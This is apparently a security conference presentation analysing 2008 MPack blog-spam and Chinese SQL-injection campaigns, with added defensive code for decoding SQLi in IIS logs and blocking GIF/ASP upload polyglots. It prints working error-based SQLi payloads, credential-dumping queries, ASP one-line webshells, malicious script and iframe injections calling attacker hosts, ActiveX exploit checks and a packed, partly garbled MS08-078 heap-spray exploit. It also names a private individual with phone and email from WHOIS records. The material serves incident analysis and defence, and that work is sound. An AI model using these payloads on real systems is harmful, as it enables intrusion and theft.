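The self-keyed scheme in lc1008.html, reproduced here as an added example (not the deck's code and not the kit's own), so the key derivation and its tamper sensitivity can be seen on a constructed payload. b64decode follows the page's QfPViCa() algorithm and xorRepeat its qpYrz() loop; the malware uses arguments.callee, which a named function reference replaces so the code also runs in strict mode. The stage text and the example.invalid URL are made up for the demo.

```javascript
const KS = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";

// Base64 decoder, same algorithm as QfPViCa() on the page.
function b64decode(ii) {
  let oo = "", i = 0;
  do {
    const e1 = KS.indexOf(ii.charAt(i++)), e2 = KS.indexOf(ii.charAt(i++));
    const e3 = KS.indexOf(ii.charAt(i++)), e4 = KS.indexOf(ii.charAt(i++));
    oo += String.fromCharCode((e1 << 2) | (e2 >> 4));
    if (e3 !== 64) oo += String.fromCharCode(((e2 & 15) << 4) | (e3 >> 2));   // 64 == '='
    if (e4 !== 64) oo += String.fromCharCode(((e3 & 3) << 6) | e4);
  } while (i < ii.length);
  return oo;
}

// Repeating-key XOR, same as the loop in qpYrz().
function xorRepeat(data, key) {
  let o = "";
  for (let i = 0; i < data.length; i++) {
    o += String.fromCharCode(data.charCodeAt(i) ^ key.charCodeAt(i % key.length));
  }
  return o;
}

// The page's key: the decoder's own source with everything but [a-zA-Z0-9] removed.
function keyOf(fn) {
  return fn.toString().replace(/[^a-zA-Z0-9]/g, "");
}

// Decoder keyed to itself (stands in for qpYrz(a1, null)).
function selfKeyedDecode(a1) {
  return xorRepeat(b64decode(a1), keyOf(selfKeyedDecode));
}

// Encoder side, i.e. what the kit's packer does: key to the exact decoder above.
function selfKeyedEncode(plain) {
  return Buffer.from(xorRepeat(plain, keyOf(selfKeyedDecode)), "latin1").toString("base64");
}

// A "patched" copy of the decoder: one added statement changes its source, hence
// its key, so the same payload no longer decodes. Instrumenting qpYrz() fails the same way.
function tamperedDecode(a1) {
  const debug = true;   // unused on purpose; its presence alone changes the key
  return xorRepeat(b64decode(a1), keyOf(tamperedDecode));
}

function demo() {
  const stage = '<script src="http://example.invalid/next-stage.js"></script>';   // constructed
  const payload = selfKeyedEncode(stage);
  return { payload, decoded: selfKeyedDecode(payload), tampered: tamperedDecode(payload) };
}
```

Because the key strips everything but letters and digits, beautifying the served script does not break decoding, which is what makes static recovery practical: copy qpYrz() as served, compute the key, and XOR, instead of letting document.write() run.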
The deobfuscated web page continues with animan.class 

- Allows the malicious web page to extend the class Applet 
- Updates the current web page to this: 

  <applet archive=Java2SE.jar code=Java2SE.class width=1 height=1 MAYSCRIPT> 
    <param name=usid value=1008> 
    <param name=uu value=http://prolnx.info/> 
    <param name=tt value=other> 
  </applet> 
  <applet archive=dsbr.jar code=MagicApplet.class width=1 height=1 name=dsbr MAYSCRIPT> 
    <param name=ModulePath value=http://prolnx.info/?id=1008&t=other&o=2> 
  </applet> 
First Applet loads
- Java2SE.jar
- /com/ms/lang/RegKeyException.class

Second Applet loads
- dsbr.jar
- /com/ms/security/securityClassLoader.class

All Java classes
- Downloaded from prolnx.info
- Intercepted and decompiled using jad
- De-obfuscated by hand

Both applets use several variables
- Gathered from their applet params
- Possibly identify the target
Variables commonly used in web requests to http://prolnx.info/

- From Java2SE.class, member of Java2SE.jar

  s  = getParameter("usid");
  s5 = getParameter("uu");
  s6 = getParameter("tt");
  // usid=1008  uu=http://prolnx.info/  tt=other
  Plog(s5 + "?id=" + s + "&t=" + s6 + "&o=4");
  // -> http://prolnx.info/?id=1008&t=other&o=4
From Installer.class, member of dsbr.jar

  s = applet.getParameter("ModulePath");
  // ModulePath=http://prolnx.info/?id=1008&t=other&o=2
  URLDownloadToFile( , s, s2, , );
  // -> http://prolnx.info/?id=1008&t=other&o=2
Any web request of this format, including the first download "GET /?id=1008&t=other&o=0 HTTP/1.1", receives a UPX-packed binary

- md5sum: adc6d03bc7ac04e2ddf9dea7ecee994f
- Delivers a payload of type 1 and installs the agony rootkit
- Although each applet delivers the same payload, each executes it by a different method
- Presumably this is for persistence and a greater degree of overall success in infection
All roads lead to MPACK

We found a test directory

[Screenshot: Firefox showing the MPack admin login page (admin.php) on the attacker's host: "Login" / "Unauthorised access prohibited. All activity is being monitored."]

MPack v0.99 readme (Russian, translated):

Installation:

1) Copy the contents to the host
2) chmod(777) the folder
3) Edit the bundle settings in the file settings.php

  $AdminPath = "http://host.com/spk2"; // path to the folder with the installed admin panel

  // login and password for access to the statistics
  $UserName = "user";
  $Password = "mpack2";

  $BlockDuplicates=1;  // 1 - block repeat visits
  $CountReferers=1;    // 1 - keep track of referers (where the traffic comes from)
  $MinRefs=5;          // minimum number of hits from a referer before it is shown on the statistics page

This version includes a large number of buffer-overflow exploits, so it is strongly reco[mmended ...] (line truncated in the screenshot)

The loader (or other file to be downloaded) must be in the folder with the installed bundle, with the file name f[...] (line truncated in the screenshot)

3.1) If MySQL is to be used for per-country statistics, configure it too:

  $UseMySQL = 0;          // change to 1 if it will be used
  $dbhost = "localhost";  // host on which MySQL runs
  $dbuser = "spluseu";
  $dbpass = "splpass";
  $dbname = "spldb";      // database name
  $dbstats = "stats";     // table name in that database
MPACK

MPACK uses some log files

- ip_all.txt & ip_0day.txt
  • Shouldn't be globally viewable, but were

- Only one IP listed in the log
  • Owned by the attacker, used when setting up MPACK: 78.155.196.69
  • Reverse DNS 196-155-78-static-69.rsspnet.ru (looks like a possible Russian DSL line?)

- domain: RSSPNET.RU
- nserver: ns2.rts.spb.ru.
- nserver: ns.rts.spb.ru.
- person: Igor Sergeevich Diakonov
- phone: +7 921 4212525
- e-mail: igorsd@sysadmins.spb.ru




[Diagram: Attack Process Flow, blog spam. E-mail register -> Comment post -> MPACK. Domain owner Chinese, domain IP Czech, visitor IP German.]
BLOG SPAM CONCLUSIONS




This attack was very complex 

Lots of evasion and obfuscation 

End goals unclear 

Changes often, updates rapidly to take 
advantage of new attacks 

Attacker(s) made mistakes 

DON'T CLICK WEIRD COMMENT LINKS! 




Chinese Injection

• Hackers are attacking thousands of websites 

• Initial goal is to compromise the tens of thousands of visitors to these sites

• Secondary goal appears to be info: 

• Game accounts 

• Passwords 

• Financial info 

• Attack infrastructure robust and quick to adapt 







Analysis process 

- View victim website, locate injected code 

- Parse victim logs for initial attack 

- WGET code from attacker site 

• Follow any links 

• Decode obfuscated instructions 

• Debug javascript 

• Decompile Java Applets 

- Lookup owners of domains / IPs 

- Reverse any exploits / binaries 







1 st stage: Find & hack website using SQLi 

- Upload backdoors 

2 nd stage: Inject small JS or FRAME 
3 rd stage: Clients visit hacked site 

- Begin complicated attack: 

• IFRAMES 

• Redirects 

• exploits 

4 th stage: Client is compromised 

- Steal game credentials, keylog, usual stuff 







Attack begins with 58.218.204.214 

- Searches the web 

• Chinese version of Google 

- Looks for target sites 

• Ending in .com with ASP in the URL 

• The word "tennis" somewhere on the site 

Other IPs from China show up scanning with various SQLi techniques



HOST INFO

inetnum:  58.208.0.0 - 58.223.255.255
netname:  CHINANET-JS
descr:    jiangsu province network
descr:    China Telecom
descr:    A12,Xin-Jie-Kou-Wai Street
descr:    Beijing 100088
country:  CN







Example Log Entry:

  2008-12-13 02:10:41 192.168.1.[victim] HEAD /vuln.asp 80 58.218.204.214 HTTP/1.0 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+.NET+CLR+2.0.50727) http://www.google.cn/search?num=100&hl=zh-CN&lr=lang_en&cr=countryUS&newwindow=1&as_qdr=all&q=inurl:asp+id+intext:tennis+site:.com&start=300&sa=N www.thevictim.com 200 299 563 312

• The referer is a google.cn search with Chinese-language interface settings (hl=zh-CN)
• cr=countryUS restricts results to US sites; the query is inurl:asp id intext:tennis site:.com
• The first contact is a HEAD request straight from the search results page






Once a target is found they attempt SQL 
injections 

Logs show HTTP 500 status codes 

- Consistent with an Internal Server Error 

- Most likely using db errors to gather info 

- Use both URL / Hex encoding as well as 
CHAR encoding & Upper / lower case 

• For detection evasion and obfuscation 






• LOG EXAMPLE

  2008-12-13 03:22:34 192.168.1.[victimip] GET /vuln.asp search=T&id=216%20%20AnD%20%28dB_NaMe%280%29%2BcHaR%2894%29%2BuSeR%2BcHaR%2894%29%2B@@vErSiOn%2BcHaR%2894%29%2B@@sErVeRnAmE%2BcHaR%2894%29%2B@@sErViCeNaMe%2BcHaR%2894%29%2BsYsTeM_UsEr%29%3D0%20%20 80 - 58.218.204.214 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) www.victim.com 200






Need a decoder for the data

- DECODER:

  ruby -e '"[INSERT ENCODED DATA HERE]".scan(/../).each { |b| print b.to_i(16).chr }; puts'

- ENCODER:

  ruby -e '"[INSERT DATA TO BE ENCODED HERE]".each_byte { |b| print "%02x" % b }; puts'

Encoded data is actually SQLi (char(94) is the caret, ^, used as a field separator in the error output):

  216 AND (DB_NAME(0)+^+USER+^+@@VERSION+^+@@SERVERNAME+^+@@SERVICENAME+^+SYSTEM_USER)=0



Colin's quick decoder

Handles both HEX, CHAR & nested encoding

Fixes case

#!/usr/bin/ruby
# Usage: decode.rb '<cs-uri-query value from the IIS log>'
encoded = ARGV[0].to_s

# %xx URL encoding
tmp = encoded.gsub(/%../) { |match| match[1..2].hex.chr }

# CHAR(nn) in any letter case (any number of digits, so char(124) works too)
tmp = tmp.gsub(/[cC][hH][aA][rR]\(\d+\)/) { |match| match[/\d+/].to_i.chr }

# 0x... hex literals; nvarchar constants come out as UTF-16LE, so the
# interleaved NULs are dropped to leave readable text
tmp = tmp.gsub(/0x([0-9a-f])+/i) { |match|
  match[2..match.length].gsub(/../) { |match1| match1.hex.chr }.delete("\0") }

puts tmp.upcase






Doubly encoded attack

  2008-12-13 03:22:35 192.168.1.[victimip] GET /vuln.asp search=T&id=216%20AnD%20%28cAsT%28iS_srvrOlEmEmBeR%280x730079007300610064006d0069006e00%29aS%20vArChAr%29%2BcHaR%2894%29%2BcAsT%28iS_srvrOlEmEmBeR%280x64006200630072006500610074006f007200%29aS%20vArChAr%29%2BcHaR%2894%29%2BcAsT%28iS_srvrOlEmEmBeR%280x620075006c006b00610064006d0069006e00%29aS%20vArChAr%29%2BcHaR%2894%29%2BcAsT%28iS_srvrOlEmEmBeR%280x6400690073006b00610064006d0069006e00%29aS%20vArChAr%29%2BcHaR%2894%29%2BcAsT%28iS_srvrOlEmEmBeR%280x730065007200760065007200610064006d0069006e00%29aS%20vArChAr%29%2BcHaR%2894%29%2BcAsT%28iS_mEmBeR%20%280x7000750062006c0069006300%29%20aS%20vArChAr%29%2BcHaR%2894%29%2BcAsT%28iS_mEmBeR%20%280x640062005f006f0077006e0065007200%29%20aS%20vArChAr%29%2BcHaR%2894%29%2BcAsT%28iS_mEmBeR%20%280x640062005f006200610063006b00750070006f00700065007200610074006f007200%29%20aS%20vArChAr%29%2BcHaR%2894%29%2BcAsT%28iS_mEmBeR%20%280x640062005f006400610074006100770072006900740065007200%29%20aS%20vArChAr%29%29%3D0%20|38|80040e07|Syntax_error_converting_the_varchar_value_'^^^^^1^1^^0'_to_a_column_of_data_type_int. 80 - 58.218.204.214 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDASCRQQRC=JEJNPOEBDIJNIJPGIFJNAGJM - www.victim.com 500 586 1174 343
Decoded version

  216 AND (CAST(IS_SRVROLEMEMBER('SYSADMIN') AS VARCHAR) + ^ +
  CAST(IS_SRVROLEMEMBER('DBCREATOR') AS VARCHAR) + ^ +
  CAST(IS_SRVROLEMEMBER('BULKADMIN') AS VARCHAR) + ^ +
  CAST(IS_SRVROLEMEMBER('DISKADMIN') AS VARCHAR) + ^ +
  CAST(IS_SRVROLEMEMBER('SERVERADMIN') AS VARCHAR) + ^ +
  CAST(IS_MEMBER('PUBLIC') AS VARCHAR) + ^ +
  CAST(IS_MEMBER('DB_OWNER') AS VARCHAR) + ^ +
  CAST(IS_MEMBER('DB_BACKUPOPERATOR') AS VARCHAR) + ^ +
  CAST(IS_MEMBER('DB_DATAWRITER') AS VARCHAR))=0
  |38|80040E07|

The hex literals are UTF-16LE role names; the concatenated string cannot be converted to int, so the 80040e07 error text carries the answer back: ^^^^^1^1^^0. The five server-role checks came back empty, IS_MEMBER('PUBLIC')=1, IS_MEMBER('DB_OWNER')=1, DB_BACKUPOPERATOR empty, DB_DATAWRITER=0. The application's login is db_owner but not sysadmin.
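The decoder and the two log lines above describe one procedure: undo the layered encoding, normalise case, read the SQL, and read the answer out of the 80040e07 error. The following is an added example, not the talk's Ruby tool, that runs that procedure over IIS log lines and flags the ones that matter. The W3C field order, the RFC 1918 victim addresses and the log lines themselves are constructed for this example; the encoded payloads are modelled on the slides.

```javascript
// Added example: decode and triage MSSQL injection attempts in IIS log lines (not the talk's tool).

// Repeat %xx decoding until the string stops changing (catches %2528 -> %28 -> '(').
function urlDecodeNested(s, maxPasses = 4) {
  let cur = s;
  for (let i = 0; i < maxPasses; i++) {
    const next = cur.replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// 0x... literal -> text. nvarchar constants arrive as UTF-16LE (every second
// byte is 0x00); anything else is treated as single-byte text.
function hexLiteralToText(hex) {
  const bytes = Buffer.from(hex.length % 2 ? "0" + hex : hex, "hex");
  const utf16 = bytes.length >= 2 && bytes.length % 2 === 0 &&
    bytes.filter((_, i) => i % 2 === 1).every((b) => b === 0);
  return utf16 ? bytes.toString("utf16le") : bytes.toString("latin1");
}

// Full normalisation of a cs-uri-query value: %xx, CHAR(n), 0x..., whitespace, case.
function decodeSqli(raw) {
  let s = urlDecodeNested(raw);
  s = s.replace(/CHAR\s*\(\s*(\d{1,3})\s*\)/gi, (_, n) => String.fromCharCode(Number(n)));
  s = s.replace(/0x([0-9a-fA-F]+)/g, (_, h) => "'" + hexLiteralToText(h) + "'");
  return s.replace(/\s+/g, " ").trim().toUpperCase();
}

// Indicators taken from the decoded payloads on the slides.
const SQLI_INDICATORS = [
  /\bIS_SRVROLEMEMBER\s*\(/, /\bIS_MEMBER\s*\(/, /@@VERSION\b/, /@@SERVERNAME\b/,
  /\bDB_NAME\s*\(/, /\bSYSTEM_USER\b/, /\bSYSOBJECTS\b/, /\bDECLARE\s+@/,
  /\bCAST\s*\(/, /\bEXEC(?:UTE)?\s*\(/,
];

// Constructed W3C field order (an assumption for this example):
// date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) cs(Referer) cs-host sc-status
function parseIisLine(line) {
  const f = line.trim().split(/\s+/);
  if (f.length < 12) return null;
  return { date: f[0], time: f[1], method: f[3], stem: f[4], query: f[5],
           clientIp: f[7], userAgent: f[8], referer: f[9], host: f[10], status: Number(f[11]) };
}

function analyseLine(line) {
  const e = parseIisLine(line);
  if (!e) return null;
  const decoded = decodeSqli(e.query);
  const hits = SQLI_INDICATORS.filter((re) => re.test(decoded)).map((re) => re.source);
  // IIS appends "|line|errcode|message" to the query field on ASP errors; 80040e07 is
  // the OLE DB conversion error that error-based injection deliberately provokes.
  const errorBased = e.status === 500 || /80040E07|SYNTAX_ERROR_CONVERTING/.test(decoded);
  return { clientIp: e.clientIp, stem: e.stem, status: e.status, decoded, hits, sqli: hits.length > 0, errorBased };
}

// Only the lines that carry indicators or an error-based signature.
function scanLog(lines) {
  return lines.map(analyseLine).filter((r) => r && (r.sqli || r.errorBased));
}

// Constructed log lines modelled on the slides.
const CONSTRUCTED_LOG = [
  "2008-12-13 03:22:34 192.168.1.10 GET /vuln.asp search=T&id=216%20%20AnD%20%28dB_NaMe%280%29%2BcHaR%2894%29%2BuSeR%2BcHaR%2894%29%2B@@vErSiOn%2BcHaR%2894%29%2BsYsTeM_UsEr%29%3D0 80 58.218.204.214 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) - www.victim.com 200",
  "2008-12-13 03:22:35 192.168.1.10 GET /vuln.asp search=T&id=216%20AnD%20%28cAsT%28iS_srvrOlEmEmBeR%280x730079007300610064006d0069006e00%29aS%20vArChAr%29%2BcHaR%2894%29%29%3D0|38|80040e07|Syntax_error_converting_the_varchar_value_'^'_to_a_column_of_data_type_int. 80 58.218.204.214 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) - www.victim.com 500",
  "2008-12-13 03:22:36 192.168.1.10 GET /vuln.asp search=T&id=216 80 10.0.0.5 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) http://www.victim.com/ www.victim.com 200",
];

if (typeof require !== "undefined" && require.main === module) {
  for (const r of scanLog(CONSTRUCTED_LOG)) {
    console.log(`${r.clientIp} ${r.stem} status=${r.status} errorBased=${r.errorBased}\n  ${r.decoded}\n  hits: ${r.hits.join(", ")}`);
  }
}
```

Two things the one-liners on the previous slide do not do are worth the extra lines: the UTF-16LE handling (without it IS_SRVROLEMEMBER(0x7300...) decodes to "s\0y\0s\0..."), and pairing the decoded SQL with the status code and error text, which is what separates a scanner fingerprinting the database from a broken link.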




Numerous Chinese tools and how-to sites exist for 
generating these types of attacks 



Example: 

• NBSI 3.0 SQLi generation tool 

• HVIEbysoftbug 



[Screenshot: NBSI 3.0 GUI (Chinese), with tabs for Scan, Inject, Database, Command and others, showing an error-based injection result: "Microsoft OLE DB Provider for SQL Server error '80040e07'", converting a varchar value to a column of data type int.]
Chinese How-to sites with similar attack code

[Screenshot: Firefox showing http://it.icxo.com/htmlnews/2004/12/03/493748.htm, an NBSI write-up (MSSQL injection). The page quotes the requests the tool sends, with the decoded query after each:]

  GET /article_read.asp?id=80;declare%20@a%20int-- HTTP/1.1
  IP : article_read.asp?id=80;declare @a int--

  GET /article_read.asp?id=80%20and%20(Select%20count(1)%20from%20[sysobjects])>=0 HTTP/1.1
  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
  User-Agent: Microsoft URL Control - 6.00.8862
  Host:
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: articleid=80%3Bdeclare %40a int%2D%2D; ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED
  IP : article_read.asp?id=80 and (Select count(1) from [sysobjects])>=0

  GET /article_read.asp?id=80%20And%20user%2Bchar(124)=0 HTTP/1.1
  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
  User-Agent: Microsoft URL Control - 6.00.8862
  Host:
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: articleid=80 and %28Select count %281 %29 from %5Bsysobjects%5D%29%3E%3D0; ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED
  IP : article_read.asp?id=80 And user+char(124)=0

[Chinese explanation, garbled in extraction. The recoverable point: `user` is an nvarchar value in SQL Server, so comparing it with an int forces a conversion error whose message discloses the login name (here "east_asp"); the classic form of the same probe is `and user>0`.]

  GET /article_read.asp?id=80%20And%20Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)=1 HTTP/1.1
  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
  User-Agent: Microsoft URL Control - 6.00.8862

Note the User-Agent, "Microsoft URL Control - 6.00.8862": it is the default of the HTTP component the tool is built on, and a useful log indicator in its own right.
Chinese How-to sites with similar attack code

[Screenshot: Firefox showing http://www.anqn.com/article/a/2005-12-28/a0976607.shtml, a Chinese NBSI walkthrough. The Chinese commentary is garbled in extraction; the recoverable fragments follow.]

2) Enumerating column values:

  And (Select Top 1 isNull(cast([sName] as varchar(8000))+char(32))+char(124) From (Select Top 9 sName From [News_Style] Where 1=1 Order by sName)T Order by sName desc)>0

Column names recovered this way (Y_Column_Name): diy_test, ithome, mobile_test, nb_test, pc_test, sale

  And (Select Top 1 isNull(cast([UserName] as varchar(8000))+char(32))+char(124)+isNull(cast([PassWord] as varchar(8000))+char(32)) From (Select Top 1 UserName,PassWord From [News_user] ...

  Microsoft OLE DB Provider for SQL Server error '80040e07'
  Syntax error converting the varchar value 'bandit|310810' to a column of data type int.

The char(124) pipe separates the UserName and PassWord fields in the error text. The commentary goes on to discuss how NBSI automates these steps and how the server's 200 and 500 responses are used to read the result.
In this particular case, the SQLi fails

Google shows several thousand websites 
redirecting to the various URLs 

- Many probably via SQLi 

• 17gamo.com 

• yrwap.cn 

• sdo.1000mg.cn 

• www3.800mg.cn 

• jjmaoduo.3322.org 

• douhunqn.cn 







58.218.204.214 discovers a library component of the victim
- Allows image uploading

Attacker uploads a file called 01.cdx to the images directory

What is a CDX file?
- A type of image object file

Image library only allows certain file types
- CDX files allowed

In this case 01.cdx is a GIF
- Contains embedded code, similar to a GIFAR:

  <script language=VBScript runat=server>execute request("go")</script>
  ;<%execute(request("lion121"))%><%executeglobal request("lion121")%><%eval request("lion121")%>








By default IIS interprets CDX files as ASP 
scripts 

The victim image library allows CDX file 
uploads 

- Some image libraries verify file type is an image 
before allowing upload 

- To bypass these checks, the attackers used a 
real GIF file with embedded VBScript 

- The image library detects a real GIF file and allows the upload to take place

- The IIS server then interprets the embedded VBScript like any other ASP script, because the .cdx extension is mapped to the ASP engine
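The two checks that failed here were independent: the library verified content (a real GIF) but not the extension, and IIS decided how to execute the file by extension alone. The following is an added example, not from the talk, of an upload check that would have rejected 01.cdx: an extension allow-list that is independent of content, magic bytes that must match the claimed extension, filename tricks rejected, and a scan of the body for server-side script delimiters. The function names and sample files are constructed for this example.

```javascript
// Added example: reject GIF/ASP polyglots such as 01.cdx at upload time (not from the talk).

// Extension -> accepted magic prefixes. Only raster image types; never anything
// IIS maps to a script engine (.asp, .asa, .cer, .cdx, ...).
const ALLOWED = new Map([
  ["gif", [Buffer.from("GIF87a"), Buffer.from("GIF89a")]],
  ["png", [Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a])]],
  ["jpg", [Buffer.from([0xff, 0xd8, 0xff])]],
  ["jpeg", [Buffer.from([0xff, 0xd8, 0xff])]],
]);

// ASP delimiters and server-side script tags as they appear in 01.cdx.
const SCRIPT_MARKERS = [
  /<%/,
  /<script[^>]*runat\s*=\s*["']?server/i,
  /\b(?:execute|executeglobal|eval)\s*\(?\s*request\s*\(/i,
];

function extensionOf(name) {
  const m = /\.([a-z0-9]+)$/i.exec(name);
  return m ? m[1].toLowerCase() : "";
}

// Returns { ok: true } or { ok: false, reason }.
function checkImageUpload(filename, bytes) {
  // Filename tricks first: NULs, the IIS "shell.asp;.gif" form, encoded separators, double extensions.
  if (/[\x00;%]/.test(filename)) return { ok: false, reason: "illegal character in filename" };
  if ((filename.match(/\./g) || []).length > 1) return { ok: false, reason: "multiple extensions" };
  const ext = extensionOf(filename);
  if (!ALLOWED.has(ext)) return { ok: false, reason: `extension .${ext || "(none)"} not allowed` };
  // Content must match the claimed type, not merely be some image.
  const magicOk = ALLOWED.get(ext).some((magic) =>
    bytes.length >= magic.length && bytes.subarray(0, magic.length).equals(magic));
  if (!magicOk) return { ok: false, reason: `content is not a ${ext} image` };
  // A valid header followed by script is exactly the polyglot case.
  const text = bytes.toString("latin1");
  const marker = SCRIPT_MARKERS.find((re) => re.test(text));
  if (marker) return { ok: false, reason: `embedded server-side script: ${marker.source}` };
  return { ok: true };
}

// Constructed samples: a minimal valid GIF, and the same header followed by the
// kind of one-line webshells recovered from 01.cdx.
const GIF_HEADER = Buffer.concat([Buffer.from("GIF89a"), Buffer.from([0x01, 0x00, 0x01, 0x00, 0x80, 0x00, 0x00])]);
const CLEAN_GIF = Buffer.concat([GIF_HEADER, Buffer.alloc(16, 0), Buffer.from([0x3b])]);
const POLYGLOT_GIF = Buffer.concat([GIF_HEADER, Buffer.from(
  ';<%execute(request("lion121"))%><script language=VBScript runat=server>execute request("go")</script>', "latin1")]);

if (typeof require !== "undefined" && require.main === module) {
  const samples = [["logo.gif", CLEAN_GIF], ["01.cdx", POLYGLOT_GIF], ["01.gif", POLYGLOT_GIF], ["shell.asp;.gif", CLEAN_GIF]];
  for (const [name, data] of samples) console.log(name, JSON.stringify(checkImageUpload(name, data)));
}
```

The marker scan is a backstop, not the main defence: a legitimate GIF can contain the bytes `<%` by chance, so in production the stronger move is to re-encode every upload through an image library and to store uploads in a directory where script mappings are removed, so that what the server will execute no longer depends on what the attacker named the file.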



They make HTTP POSTs to the CDX

This makes analysis more difficult, because a POST leaves little information in the web logs (the request body is not logged).

They make one GET:

  2008-12-13 04:25:15 192.168.1.[victimip] GET /Images/01.cdx |18|800a000d|Type_mismatch:_'execute' 80 - 58.218.204.214 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1) http://www.victim.com/vuln_image_library.asp www.victim.com 500

The 800a000d "Type mismatch: 'execute'" error is itself evidence: the server parsed 01.cdx as ASP and ran the execute statement with an empty request("go"), so the backdoor is live.



Then follows a series of about five POSTs to the .cdx file

Then they create log.asp and top.asp

log.asp is a fairly well known Chinese-language ASP backdoor

Username for the backdoor is "lion121"

Password is some Chinese character string






We can determine a few things from the way they use this backdoor

First they use GETs instead of POSTs, which lets us see what params are passed to the app:

  GET /Images/log.asp Action=Show1File
  GET /Images/log.asp Action=MainMenu
  GET /Images/log.asp Action=UpFile
  GET /Images/log.asp Action=Cmd1Shell
  GET /top.asp Action=plgm



Then they switch to POSTs
- Eliminates our ability to see the parameters

  POST /Images/log.asp Action2=Post
  POST /Images/log.asp

Eventually, after many posts, they embed their code on every page of the victim's site:

  <script src=http://yrwap.cn/h.js></script>



• Source of the JS:

  document.write("<iframe width='100' height='0' src='http://www.17gamo.com/coo/index.htm'></iframe>");^M
  document.write("<iframe width='0' height='0' src='http://www.trinaturk.com/faq.htm'></iframe>");^M

• We've seen 17gamo before in failed SQLi attempts
• Probably indicates all attacks / IPs are related
• Note the ^M (carriage return) line endings, probably created on Windows
• Begins typical IFRAME redirects in many directions



<script language="javascript" src="http://count17.51yes.com/click.aspx?id=171044941&logo=1"></script>
<html><script>
document.write("<iframe width=100 height=0 src=14.htm></iframe>");
document.write("<iframe width=100 height=0 src=flash.htm></iframe>");
if (navigator.userAgent.toLowerCase().indexOf("msie7") > 0)
  document.write("<iframe src=IE7.htm width=100 height=0>");
try { var d;
  var lz = new ActiveXObject("NCTAudio" + "File2.AudioFile2.2"); }
catch (d) { };
finally { if (d != "[object Error]") { document.write(""); } }
try { var b;
  var of = new ActiveXObject("snpvw.Snap" + "shot Viewer Control.1"); }
catch (b) { };
finally { if (b != "[object Error]") { document.write("<iframe width=100 height=0 src=office.htm") } }
function Game() {
  Sameee = "IERPCtl.IERPCtl.1";
  try { Gime = new ActiveXObject(Sameee); }
  catch (error) { return; }
  Tellm = Gime.PlayerProperty("PRODUCT" + " VERSION");
  if (Tellm <= "6.0.14.552")
    document.write("");
  else document.write(""); }
Game();
</script>

(The 51yes.com script is a hit counter. ProgIDs are split into concatenated string fragments so that a signature for the whole name does not match. Each ActiveXObject probe succeeds only if the control is installed, and the hidden iframe for that exploit is written only then; the two document.write("") calls appear with empty strings on the slide.)
Deploys multiple exploits

- IE 7 MS08-078 (a recent 0day at the time)
- RealPlayer IERPCtl exploit, gated on PlayerProperty("PRODUCT VERSION") <= 6.0.14.552 (the slide labels this a Flash exploit, but the version check in the landing page above is on the IERPCtl control)
- Microsoft Access Snapshot Viewer ActiveX Control Exploit
- RealPlayer rmoc3260.dll ActiveX Control Heap Corruption
- IE NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow
- A ton of other SWF exploits depending on version (at least 12 counted)




IE 7 MS08-078

<html>
<div id="le70day">x</div>
<script>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('a
z=9("% 1 h%f% 1 g% 1 f%1 i% 1 j%r% 11% 1 k% 1 e% 1 d% 1 7%r% 1 6%l% 1 5% 1 8% 1 9% 1 c% 1 b% 1 a% 1 m% 1 n% 1 z% 1 y% 1 x 
%1A%1B%1D%1C%1w%1v%l%1q%14%1o%1r%1s%1u%1t%1E%U%K%M%N%H%F%A%B%m%D%E%0%m 
%Z%g%b%q%Y%1 1 %g%b%q%y%1 3%6%R%W%P%L%T%S%s%Q%V%6%1 2%1 0%G%J%1 p%1 Q%2n%c%7 
%2m%2o%2p%s%6%7%2q%2l%2k%y%1F%2f%2e%7%2d%2g%2h%2t%c%2i%2s%1%2B%2E%2D%2G%2F% 
4%2I%1 %2H%2C%2w%2v%2u%2x%2y%2A%2z%4%2j%1 %k%j%4%2b% 1 %k%j%4%2c%1 %1 R%1 S%1 U%o% 
1T%1 0%1 N%1 1%1 H%1 G%1 J%1 K%n%o%n%1 M%1 L%f );a 2=9("%8%8");1 V{2+=2}1 W(2.26<25);d=27 
28();2a(i=0;i<29;i++)d[i]=2+z;e="<3 x=l><X><C><![23[<1Y 1X=1Z://&#w;&#w;.20.22>]]></C></X></3><5 t=#l u=C 
v=p><3 x=l></3><5 t=#l u=C 

v=p></5></5>";h=21.24("1P");h.2r=e;',62,169;|uffff|spray|XML|ue800|SPAN|uff52|u53d0|u0a0a|unescape|var|u0e 
4e|uff00|memory|xmlcode|u0000|u8e68|tag||u765c|u2e2e|ueb01|u5b8b|u6e69 
TASRC|DATAFLD|DATAFORMATAS|x0a0a|ID|uebd6|shellcode|u6459|u198b 
U6a59|u5e5f|uaa68|u5b5d|u08c2|u1b8b|u5352|u4deb|u89d0|uff7c " "" " "" 
